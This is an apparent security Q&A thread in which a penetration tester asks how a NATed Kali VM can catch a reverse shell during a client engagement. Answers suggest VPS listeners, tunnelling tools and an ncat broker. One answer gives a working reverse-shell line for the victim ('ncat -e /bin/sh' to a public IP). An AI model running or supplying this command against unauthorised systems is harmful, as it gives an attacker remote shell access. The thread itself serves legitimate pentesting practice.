4

I am running Kali Linux as a VM on my Windows machine which is NAT'd behind my company network, if I wish to pen test a website for a client and believe that a reverse shell is possible, what is a good way of achieving the connection?

Note that I am not asking how to execute the exploit or inject the shellcode, but I am asking for a simple way for my local netcat to listen on a public IP address.

My thoughts so far:

  • VPN/SSH tunnel to a server to give me a direct internet connection that my Kali VM can connect to and I use the public IP address of this connection for my reverse shell.
  • Port forward from my company's internet connection to my VM (not a good solution if multiple ports on multiple protocols are required).
  • Setup a DMZ to my Kali VM - again not a good solution on a company network.
  • Run Kali from the cloud. However, this would mean maintaining my local VM as well as the cloud version, and also Amazon would need to be informed of any penetration tests in advance.
SilverlightFox
  • 33,408
  • 6
  • 67
  • 178
  • Why a reverse shell? Just open a port that connecting to gives a shell. Your problem indicates that you can already execute code remotely. Set up a VPS if you NEED a reverse shell that is internet facing. –  Mar 17 '14 at 15:48
  • @Rell3oT Bind shell? If there is a firewall, egress rules are less likely. – SilverlightFox Mar 17 '14 at 15:58
  • The linked [Amazon page](https://aws.amazon.com/security/penetration-testing/) states that you need a permission “for penetration testing or scanning of your resources”. So if you’re pentesting an AWS system, you need a permission. But it doesn’t say anything about using an AWS system for pentesting other systems. So I guess it’s fine to use it. – Gumbo Mar 17 '14 at 16:43
  • @Gumbo Possibly - the Kali paged stated `If you plan on using Kali Linux for any aggressive scanning on the Internet, make sure to update the Amazon security team`. – SilverlightFox Mar 17 '14 at 16:48
  • 1
    @SilverlightFox You could still scan from your own machine. You wouldn’t even need another Kali if you’d use port forwarding via SSH. – Gumbo Mar 17 '14 at 16:59

3 Answers3

1

You could configure pwnat but you need control of both sides to negotiate the UDP hole punch. Now I want some crazy MSF developer to add this functionality to Meterpreter. Similar techniques include tools like matahari (or, older, pbounce) and particular networks such as iodine (DNS) or onioncat (Tor nodes).

If I were you, my phone would be a quick hotspot and some sort of dynamic DNS could be used. Thus, hole punching is largely unnecessary and so are a lot of other elements you allude to in your question such as IaaS, regulations, due diligence, simplicity, et al. If you have a wired coporate connection along with the WiFi hotspot connction, you could be on both networks at the same time.

atdre
  • 18,885
  • 6
  • 58
  • 107
0

You can do it with ncat on a third machine that is publicly accessible (I use my AWS server):

ncat --broker <port>

Attacking machine:

ncat <public IP> <port>

Victim machine:

ncat -e /bin/sh <public IP> <port>
enderw00t
  • 1
  • 2
0

The best solution is to run any Linux machine with a public IP address such as a VPS, an AWS machine, or even a server that you use for pentesting only.

From here you can run metasploit and/or ncat listeners. It's easiest if the firewall and iptables are disabled.

Metasploit could be run either locally but with the reverse host set to the internet based machine, or entirely on the internet based machine. Another option would be to SSH to the machine and forward ports if you want to run anything locally.

One thing to note is for pentesting engagements it is probably undesirable to use bind shells as there is always the possibility that a malicious may connect and take control unless some effective form of access controls are used for the shell.

SilverlightFox
  • 33,408
  • 6
  • 67
  • 178